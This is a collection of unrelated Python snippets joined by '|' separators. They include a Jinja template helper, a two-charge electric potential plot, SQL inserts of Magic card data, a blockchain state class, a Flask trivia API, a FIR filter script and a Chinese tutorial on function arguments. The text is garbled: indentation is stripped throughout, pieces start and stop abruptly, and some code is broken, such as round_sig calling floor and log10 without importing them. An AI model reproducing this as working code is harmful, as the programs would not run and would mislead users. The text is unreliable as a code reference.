migrate = Migrate(app, db)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from werkzeug.wrappers import Response
from jinja2 import Environment, FileSystemLoader
template_path = os.path.join(os.path.dirname(__file__), 'templates')
jinja_env = Environment(loader=FileSystemLoader(template_path), autoescape=True)
def render_template(template_name, **context):
t = jinja_env.get_template(template_name)
return Response(t.render(context), mimetype='text/html')
def template(template_name):
def renderer(func):
def wrapper(request, *args, **kwargs):
context = func(request, *args, **kwargs)
if not type(context) is dict:
return context
return render_template(template_name, **context)
return wrapper
return renderer
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 24 21:30:41 2020
@author: shaun
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import plotly.express as px
import plotly.graph_objects as go
def round_sig(x, sig):
return round(x, sig-int(floor(log10(abs(x))))-1)
#a function to calculate the distance from a point in a grid
def distance(x,y,point,boxsize):
#x component of r
rx=(x-point[0])**2
ry=(y-point[1])**2
#y component
r=rx+ry
r=r**(0.5)
#calculate r from the size of each bin in the grid
r=r*boxsize
return r
#make matrix it's odd so that the center is easy to find
N=101
#define the space to be from -0.5 meters to 0.5 meters in x and y
x=np.linspace(-0.5,0.5,N)
y=np.linspace(0.5,-0.5,N)
#create matrix A is the real matrix and Aplot is the matrix that is used to help in visualizing
A=np.empty([N,N],float)
Aplot=np.empty([N,N],float)
#center of the matrix
center=(N-1)/2
#in meters
#sets the size of each grid in matrix A
boxsize=abs(x[0]-x[1])
#sets the location of the positive charge
a=np.array([center-(0.05/boxsize),center],float)
#sets the location of the negative charge
b=np.array([center+(0.05/boxsize),center],float)
#permitivity of freespace
e=8.85418782*(10**(-12))
#limit of acceptable potentials
limit=1e+010
#fill matrix with potetials at each point in the grid
for row in range(0,N):
for col in range(0,N):
potentiala=1/(4.0*np.pi*e*(distance(row,col,a,boxsize)))
potentialb=-1/(4.0*np.pi*e*(distance(row,col,b,boxsize)))
A[row][col]=(potentiala+potentialb)
if((potentiala+potentialb)<-limit ):
Aplot[row][col]=-limit
elif((potentiala+potentialb)>limit):
Aplot[row][col]=limit
else:
Aplot[row][col]=(potentiala+potentialb)
#plot the heat map
fig = go.Figure(data=go.Heatmap(
z=Aplot,
x=x,
y=y,
hoverongaps = False)
)
fig.update_layout(
xaxis_title="X meters",
yaxis_title="Y meters",
title='Eletric Potential of two point charges'
)
fig.show()
#find the gradient of A to get the eltric field plot using quiver
v, u = np.gradient(Aplot, boxsize, boxsize)
figure1=plt.figure()
ax = figure1.add_subplot()
ax.set_xlabel("X meters")
ax.set_ylabel("Y meters")
q = ax.quiver(x, y, u, v)
figure1.suptitle("Eletric Field of 2 point charges")
plt.show()
|
# part - 1 [Take variables with values of different types]
Name = "sara"
Age = 20
College = "Bhavans women college"
Height = 5.5
Obesity = False
# part - 2 [Print these in different lines and with appropriate messages (use .format()]
print("My name is {}.".format(Name))
print("I am {} years old.".format(Age))
print("I am from {}.".format(College))
print("My height is {}inches.".format(Height))
print("I have obesity : {}".format(Obesity))
# part - 3 [Real world example of variable apart from which i gave in class]
"""
Variables are numbers that don't have a fixed value,
examples :
1. Distance and time during a trip.
2. Amount of wages earned and hours worked by a labour.
3. Temperature changes daily based upon the climate.
"""
|
import pymysql.cursors
connection = pymysql.connect(host=#'hostname',
user=#'username',
password=#'password',
db=#'dbname',
charset=#'utf8',
cursorclass=pymysql.cursors.DictCursor)
try:
with connection.cursor() as cursor:
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Aggressive Instinct','[\\'green\\']','[]','','Target creature you control deals damage equal" \
" to its power to target creature you don’t control.','26','sorcery','2','','','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Ancestor Dragon','[\\'white\\']','[]','Dragon','Flying\n" \
"Whenever one or more creatures you control attack, you gain 1 life for each attacking creature.'" \
",'144','creature','6','5','6','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Armored Whirl Turtle','[\\'blue\\']','[]','Turtle','','20','creature','3','0','5','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Breath of Fire','[\\'red\\']','[]','','Breath of Fire deals 2 damage to target creature.'," \
"'22','instant','2','','','','0','');"
cursor.execute(sql)
sql ="insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Cleansing Screech','[\\'red\\']','[]',''," \
"'Cleansing Screech deals 4 damage to any target.','176','sorcery','5','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Colorful Feiyi Sparrow','[\\'white\\']','[]','Bird'," \
"'Flying','6','creature','2','1','3','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Confidence from Strength','[\\'green\\']','[]',''," \
"'Target creature gets +4/+4 and gains trample until end of turn.','52','sorcery','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Dragon\\'s Presence','[\\'white\\']','[]',''," \
"'Dragon’s Presence deals 5 damage to target attacking or blocking creature.','12','instant','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Drown in Shapelessness','[\\'blue\\']','[]',''," \
"'Return target creature to its owner’s hand.','10','instant','2','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Earth-Origin Yak','[\\'white\\']','[]','Ox'," \
"'When Earth-Origin Yak enters the battlefield, creatures you control get +1/+1 until end of turn.'," \
"'24','creature','4','2','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Earthshaking Si','[\\'green\\']','[]','Beast'," \
"'Trample','416','creature','6','5','5','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Feiyi Snake','[\\'green\\']','[]','Snake'," \
"'Reach','26','creature','2','2','1','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Ferocious Zheng','[\\'green\\']','[]','Cat・Beast'," \
"'','676','creature','4','4','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Fire-Omen Crane','[\\'red\\']','[]','Bird・Spirit'," \
"'Flying\nWhenever Fire-Omen Crane attacks, it deals 1 damage to target creature an opponent controls.'," \
"'968','creature','5','3','3','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Hardened-Scale Armor','[\\'green\\']','[]','Aura'," \
"'Enchant creature\nEnchanted creature gets +3/+3.','52','enchantment','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Heavenly Qilin','[\\'white\\']','[]','Kirin'," \
"'Flying\nWhenever Heavenly Qilin attacks, another target creature you control gains flying until" \
" end of turn.','12','creature','3','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Jiang Yanggu','[\\'green\\']','[legendary]','Yanggu'," \
"'+1: Target creature gets +2/+2 until end of turn.\n" \
"−1: If you don’t control a creature named Mowu, create a legendary 3/3 green Hound creature token named Mowu.\n" \
"−5: Until end of turn, target creature gains trample and gets +X/+X, where X is the number of lands you control.'," \
"'208','planeswalker','5','','','','0','4');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Journey for the Elixir','[\\'green\\']','[]',''," \
"'Search your library and graveyard for a basic land card and a card named Jiang Yanggu, reveal them," \
" put them into your hand, then shuffle your library.','52','sorcery','3','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Leopard-Spotted Jiao','[\\'red\\']','[]','Beast'," \
"'','26','creature','2','3','1','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Moon-Eating Dog','[\\'blue\\']','[]','Hound'," \
"'As long as you control a Yanling planeswalker, Moon-Eating Dog has flying.'," \
"'40','creature','4','3','3','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Mu Yanling','[\\'blue\\']','[legendary]','Yanling'," \
"'+2: Target creature can’t be blocked this turn.\n−3: Draw two cards.\n" \
"−10: Tap all creatures your opponents control. You take an extra turn after this one.'," \
"'400','planeswalker','6','','','','0','5');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Nine-Tail White Fox','[\\'blue\\']','[]','Fox・Spirit'," \
"'Whenever Nine-Tail White Fox deals combat damage to a player, draw a card.'," \
"'20','creature','3','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Purple-Crystal Crab','[\\'blue\\']','[]','Crab'," \
"'When Purple-Crystal Crab dies, draw a card.'," \
"'10','creature','2','1','1','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Qilin\\'s Blessing','[\\'white\\']','[]','','Target creature gets +2/+2 until end of turn.'," \
"'3','instant','1','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Reckless Pangolin','[\\'green\\']','[]','Pangolin'," \
"'Whenever Reckless Pangolin attacks, it gets +1/+1 until end of turn.'," \
"'52','creature','3','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Rhythmic Water Vortex','[\\'blue\\']','[]',''," \
"'Return up to two target creatures to their owner’s hand.\n" \
"Search your library and/or graveyard for a card named Mu Yanling, reveal it, and put it into your hand. " \
"If you searched your library this way, shuffle it.','200','sorcery','5','','','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Sacred White Deer','[\\'green\\']','[]','Elk'," \
"'{3}{G}, {T}: You gain 4 life. Activate this ability only if you control a Yanggu planeswalker.'," \
"'26','creature','2','2','2','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Screeching Phoenix','[\\'red\\']','[]','Phoenix'," \
"'Flying\n{2}{R}: Creatures you control get +1/+0 until end of turn.'," \
"'1936','creature','6','4','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Stormcloud Spirit','[\\'blue\\']','[]','Spirit'," \
"'Flying','200','creature','5','4','4','','0','');"
cursor.execute(sql)
sql = "insert into fixed_card_data (name,color,supertype,subtype,text,cost,cardtype,cmc,power,toughness," \
"redirect_name,redirect_id,loyalty) " \
"values('Vivid Flying Fish','[\\'blue\\']','[]','Fish・Lizard'," \
"'Vivid Flying Fish has flying as long as it’s attacking.','10','creature','2','1','1','','0','');"
cursor.execute(sql)
connection.commit()
finally:
connection.close()
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
from addressing.b4e_addressing import addresser
from protobuf.b4e_protobuf import actor_pb2
from protobuf.b4e_protobuf import record_pb2
from protobuf.b4e_protobuf import b4e_environment_pb2
from protobuf.b4e_protobuf import class_pb2
from protobuf.b4e_protobuf import voting_pb2
import logging
LOGGER = logging.getLogger(__name__)
class B4EState(object):
def __init__(self, context, timeout=10):
self._context = context
self._timeout = timeout
def get_b4e_environment(self):
try:
address = addresser.ENVIRONMENT_ADDRESS
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = b4e_environment_pb2.B4EEnvironmentContainer()
container.ParseFromString(state_entries[0].data)
for environment in container.entries:
return environment
return None
except Exception as e:
print("Err :", e)
return None
def set_b4e_environment(self, transaction_id):
"""Creates a new agent in state
Args:
"""
environment = b4e_environment_pb2.B4EEnvironment(institution_number=0, transaction_id=transaction_id)
environment_address = addresser.ENVIRONMENT_ADDRESS
container = b4e_environment_pb2.B4EEnvironmentContainer()
state_entries = self._context.get_state(
addresses=[environment_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([environment])
data = container.SerializeToString()
updated_state = {}
updated_state[environment_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def add_one_b4e_environment(self, transaction_id):
address = addresser.ENVIRONMENT_ADDRESS
container = b4e_environment_pb2.B4EEnvironmentContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for env in container.entries:
env.institution_number += 1
env.transaction_id = transaction_id
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def get_actor(self, public_key):
try:
address = addresser.get_actor_address(public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = actor_pb2.ActorContainer()
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == public_key:
return actor
return None
except Exception as e:
print("Err :", e)
return None
def set_actor(self, actor, public_key):
"""Creates a new agent in state
Args:
"""
actor_address = addresser.get_actor_address(public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[actor_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([actor])
data = container.SerializeToString()
updated_state = {}
updated_state[actor_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def set_active_actor(self, public_key):
address = addresser.get_actor_address(public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == public_key:
actor.status = actor_pb2.ACTIVE
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def set_reject_actor(self, public_key):
address = addresser.get_actor_address(public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == public_key:
actor.status = actor_pb2.REJECT
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def get_voting(self, public_key):
try:
address = addresser.get_voting_address(public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = voting_pb2.VotingContainer()
container.ParseFromString(state_entries[0].data)
for voting in container.entries:
if voting.elector_public_key == public_key:
return voting
return None
except Exception as e:
print("Err :", e)
return None
def set_voting(self, voting, public_key):
voting_address = addresser.get_voting_address(public_key)
container = voting_pb2.VotingContainer()
state_entries = self._context.get_state(
addresses=[voting_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([voting])
data = container.SerializeToString()
updated_state = {}
updated_state[voting_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def update_voting(self, public_key, vote_result, vote, timestamp):
address = addresser.get_voting_address(public_key)
container = voting_pb2.VotingContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for voting in container.entries:
if voting.elector_public_key == public_key:
voting.vote.extend([vote])
voting.close_vote_timestamp = timestamp
voting.vote_result = vote_result
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def get_class(self, class_id, institution_public_key):
try:
address = addresser.get_class_address(class_id, institution_public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = class_pb2.ClassContainer()
container.ParseFromString(state_entries[0].data)
for class_ in container.entries:
if class_.class_id == class_id:
return class_
return None
except Exception as e:
print("Err :", e)
return None
def set_class(self, class_id, class_):
class_address = addresser.get_class_address(class_id, class_.institution_public_key)
container = class_pb2.ClassContainer()
state_entries = self._context.get_state(
addresses=[class_address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([class_])
data = container.SerializeToString()
updated_state = {}
updated_state[class_address] = data
response_address = self._context.set_state(updated_state, timeout=self._timeout)
def get_record(self, record_id, owner_public_key, manager_public_key):
try:
address = addresser.get_record_address(record_id, owner_public_key, manager_public_key)
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container = record_pb2.RecordContainer()
container.ParseFromString(state_entries[0].data)
for record in container.entries:
if record.record_id == record_id:
return record
return None
except Exception as e:
print("Err :", e)
return None
def set_record(self, record_id, record):
address = addresser.get_record_address(record_id, record.owner_public_key, record.manager_public_key)
container = record_pb2.RecordContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
container.entries.extend([record])
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def update_record(self, record_id, owner_public_key, manager_public_key, record_data, active, timestamp,
transaction_id):
new_data = record_pb2.Record.RecordData(
record_data=record_data,
active=active,
timestamp=timestamp,
transaction_id=transaction_id
)
address = addresser.get_record_address(record_id, owner_public_key, manager_public_key)
container = record_pb2.RecordContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for record in container.entries:
if record.record_id == record_id:
record.record_data.extend([new_data])
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
def update_actor_info(self, actor_public_key, info):
address = addresser.get_actor_address(actor_public_key)
container = actor_pb2.ActorContainer()
state_entries = self._context.get_state(
addresses=[address], timeout=self._timeout)
if state_entries:
container.ParseFromString(state_entries[0].data)
for actor in container.entries:
if actor.actor_public_key == actor_public_key:
actor.info.extend([info])
data = container.SerializeToString()
updated_state = {}
updated_state[address] = data
self._context.set_state(updated_state, timeout=self._timeout)
|
import os
from flask import Flask, request, abort, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
import random
from models import setup_db, Question, Category
QUESTIONS_PER_PAGE = 10
def paginate_questions(request, selection):
page = request.args.get('page', 1, type=int)
start = (page - 1) * QUESTIONS_PER_PAGE
end = start + QUESTIONS_PER_PAGE
questions = [question.format() for question in selection]
current_questions = questions[start:end]
return current_questions
class AbortError(Exception):
def __init__(self, code):
self.code = code
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__)
setup_db(app)
CORS(app)
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origins', '*')
return response
@app.route('/categories')
def retrieve_categories():
categories = {category.id: category.type for
category in Category.query.all()}
if len(categories) == 0:
abort(404)
obj = jsonify({
'success': True,
'categories': categories
})
return obj
@app.route('/questions')
def retrieve_questions():
selection = Question.query.order_by(Question.id).all()
current_questions = paginate_questions(request, selection)
categories = {category.id: category.type for category in
Category.query.all()}
if len(current_questions) == 0:
abort(404)
return jsonify({
'success': True,
'questions': current_questions,
'total_questions': len(Question.query.all()),
"categories": categories,
"current_category": None,
})
@app.route('/questions/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
try:
question_query = Question.query.filter(Question.id == question_id)
question = question_query.one_or_none()
if question is None:
raise AbortError(404)
question.delete()
return jsonify({
'success': True,
'deleted': question_id,
'total_questions': len(Question.query.all())
})
except AbortError as e:
abort(e.code)
except Exception:
abort(422)
@app.route('/questions', methods=['POST'])
def create_question():
body = request.get_json()
if body is None:
abort(422)
search_term = body.get('searchTerm')
try:
if search_term:
selection = Question.query.order_by(Question.id).filter(
Question.question.ilike('%{}%'.format(search_term)))
current_questions = paginate_questions(request, selection)
if len(current_questions) == 0:
raise AbortError(404)
return jsonify({
'success': True,
'questions': current_questions,
'total_questions': len(selection.all()),
'current_category': None
})
else:
new_title = body.get('question', None)
if new_title is None:
raise AbortError(404)
new_answer = body.get('answer', None)
if new_answer is None:
raise AbortError(404)
new_difficulty = body.get('difficulty', None)
if new_difficulty is None:
raise AbortError(404)
new_category = body.get('category', None)
if new_category is None:
raise AbortError(404)
question = Question(new_title, new_answer,
new_category, new_difficulty)
question.insert()
return jsonify({
'success': True,
'created': question.id,
'total_questions': len(Question.query.all())
})
except AbortError as e:
abort(e.code)
except Exception:
abort(422)
@app.route('/categories/<int:category_id>/questions')
def retrieve_categories_by_id(category_id):
category = Category.query.get(category_id)
selection = Question.query.order_by(
Question.id).filter_by(category=category_id)
current_questions = paginate_questions(request, selection)
if len(current_questions) == 0:
abort(404)
return jsonify({
'success': True,
'questions': current_questions,
'total_questions': len(selection.all()),
'current_category': category.format()
})
@app.route('/quizzes', methods=['POST'])
def play_quiz():
body = request.get_json()
try:
previous_questions = body.get('previous_questions', None)
quiz_category = body.get('quiz_category', None)
quiz_category_id = quiz_category.get('id', -1)
if quiz_category_id == 0:
selection = Question.query.order_by(Question.id).filter(
Question.id.notin_(previous_questions)).all()
else:
category = Category.query.get(quiz_category_id)
if category is None:
raise AbortError(404)
selection = Question.query.order_by(Question.id).filter_by(
category=quiz_category_id).filter(
Question.id.notin_(previous_questions)).all()
selection_length = len(selection)
if selection_length > 0:
selected_question = selection[random.randrange(
0, selection_length)]
return jsonify({
'success': True,
"question": selected_question.format()
})
else:
return jsonify({
"success": True,
"question": None
})
except AbortError as e:
abort(e.code)
except Exception:
abort(422)
@app.errorhandler(404)
def not_found(error):
return jsonify({
"success": False,
"error": 404,
"message": "Resource not found"
}), 404
@app.errorhandler(422)
def unprocessable(error):
return jsonify({
"success": False,
"error": 422,
"message": "unprocessable"
}), 422
return app
|
"""Custom renderers for DRF."""
import csv
from io import StringIO
from rest_framework import renderers
class CSVRenderer(renderers.BaseRenderer):
"""Custom CSV renderer."""
media_type = "text/csv"
format = "csv"
def render(self, data, media_type=None, renderer_context=None):
with StringIO() as fp:
csvwriter = csv.writer(fp)
for item in data:
csvwriter.writerow(item)
content = fp.getvalue()
return content
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 10:07:23 2019
@author: nico
"""
import numpy as np
from scipy import signal as sig
import matplotlib.pyplot as plt
import control
import os
os.system ("clear") # limpia la terminal de python
plt.close("all") #cierra todos los graficos
num = np.array([1/5, 1/5, 1/5, 1/5, 1/5])
den = np.array([1, 0, 0, 0, 0])
z, p, k = sig.tf2zpk(num,den)
print("Z =", z, "\n", "P =", p, "\n", "K =", k, "\n")
ww, hh = sig.freqz(num, den)
ww = ww / np.pi
eps = np.finfo(float).eps
#plt.figure("Filtro FIR")
#plt.subplot(2, 1, 1)
#plt.title('Módulo')
#plt.plot(ww, 20 * np.log10(abs(hh)))
#plt.xlabel('Frequencia normalizada')
#plt.ylabel('Modulo [dB]')
#plt.grid()
#plt.subplot(2, 1, 2)
#plt.title('Fase')
#plt.plot(ww, np.angle(hh))
#plt.xlabel('Frequencia normalizada')
#plt.ylabel('[Rad]')
#plt.grid()
#plt.show()
#plt.tight_layout()
plt.figure("Filtro FIR")
ax1 = plt.subplot(2, 1, 1)
ax1.set_title('Módulo')
ax1.plot(ww, 20 * np.log10(abs(hh)+eps))
ax1.set_xlabel('Frequencia normalizada')
ax1.set_ylabel('Modulo [dB]')
plt.grid()
ax2 = plt.subplot(2, 1, 2)
ax2.set_title('Fase')
ax2.plot(ww, np.angle(hh))
ax2.set_xlabel('Frequencia normalizada')
ax2.set_ylabel('[Rad]')
plt.grid()
plt.show()
plt.tight_layout()
tf = control.TransferFunction(num,den,1)
print (tf)
control.pzmap(tf, Plot=True, title='Pole Zero Map', grid=True)
#plt.figure("Diagramas de polos y ceros")
#plt.plot(z.real, z.imag, 'o')
#plt.plot(p.real, p.imag, 'x')
#plt.xlabel('Re')
#plt.ylabel('Im')
#plt.grid()
#plt.show()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/5/11 下午8:33
# @Author : Lucas Ma
# @File : defunc
# 自定义函数
def my_abs(x):
if not isinstance(x, (int, float)):
raise TypeError('bad operand type')
if x >= 0:
return x
else:
return -x
print(my_abs(-9))
# 如果想定义一个什么事也不做的空函数,可以用pass语句:为了不使语法报错, 可以使用pass ,如果你还没有想好怎么写函数的代码,
# 可以先放一个pass,
def nop():
pass
import math
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
res = move(100, 100, 60, math.pi / 6)
print(res)
# 函数的参数
def power(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
print(power(5, 3))
# 计算 a*a + b*b + c*c
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3]))
'''
利用可变参数修改上面的函数
定义可变参数和定义一个list或tuple参数相比,仅仅在参数前面加了一个*号。
在函数内部,参数numbers接收到的是一个tuple,因此,函数代码完全不变。但是,调用该函数时,可以传入任意个参数,包括0个参数:
'''
def calc(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc(1, 2, 4))
print(calc(2))
print(calc())
'''
如果已经有一个list或者tuple,要调用一个可变参数怎么办?可以这样做:
在list或tuple前面加一个*号,把list或tuple的元素变成可变参数传进去 最常见的写法
'''
nums = [1, 2, 3]
print(calc(*nums))
'''
关键字参数
可变参数允许你传入0个或任意个参数,这些可变参数在函数调用时自动组装为一个tuple。
而关键字参数允许你传入0个或任意个含参数名的参数,这些关键字参数在函数内部自动组装为一个dict。请看示例:
'''
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
person('lucas', '24')
# 传入人一个关键字参数
person('Bob', 35, city='Beijing')
person('Adam', 45, gender='M', job='Engineer')
# 和可变参数类似,也可以先组装出一个dict,然后,把该dict转换为关键字参数传进去:
extra = {'city': 'Beijing', 'job': 'Engineer'}
person('Jack', 24, city=extra['city'], job=extra['job'])
'''
命名关键字参数
对于关键字参数,函数的调用者可以传入任意不受限制的关键字参数。至于到底传入了哪些,就需要在函数内部通过kw检查。
如果要限制关键字参数的名字,就可以用命名关键字参数,例如,只接收city和job作为关键字参数。这种方式定义的函数如下:
和关键字参数**kw不同,命名关键字参数需要一个特殊分隔符*,*后面的参数被视为命名关键字参数。
'''
def person(name, age, *, city, job):
print(name, age, city, job)
person('Jack', 24, city='Beijing', job='Engineer')
# 如果函数定义中已经有了一个可变参数,后面跟着的命名关键字参数就不再需要一个特殊分隔符*了:
def person(name, age, *args, city, job):
print(name, age, args, city, job)
'''
在Python中定义函数,可以用必选参数、默认参数、可变参数、关键字参数和命名关键字参数,这5种参数都可以组合使用。
但是请注意,参数定义的顺序必须是:必选参数、默认参数、可变参数、命名关键字参数和关键字参数。
'''
def f1(a, b, c=0, *args, **kw):
print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
|
def add_books():
title = input("Title: ").strip().title()
author = input("Author: ").strip().title()
year = input("Publishing year: ").strip()
book = f"{title},{author},{year},Not read\n"
with open('books.csv' , 'a') as reading_list:
reading_list.write(book)
def get_all_books():
books = []
with open("books.csv", "r") as reading_list:
for book in reading_list:
